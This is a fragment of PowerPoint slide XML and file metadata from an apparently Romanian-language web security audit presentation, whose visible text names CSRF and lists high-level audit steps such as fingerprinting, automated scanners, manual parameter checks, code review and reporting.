              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>CSRF (Cross Site Request Forgery)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23663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1435685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Audit de securitate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="28194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smtClean="0"/>
              <a:t>Fingerprinting pentru OS, X-Powered-By…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Intelegerea aplicatiei web, cum functioneaza</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Scannere automate pentru o idee generala: Acunetix, HP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Verificarea manuala a parametrilor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Verificarea codului (whitebox)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Raport complet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26233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1441</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>222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Nytro</dc:creator>
  <cp:lastModifiedBy>Nytro</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-04-08T18:25:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-04-09T00:58:13Z</dcterms:modified>
</cp:coreProperties>
</file>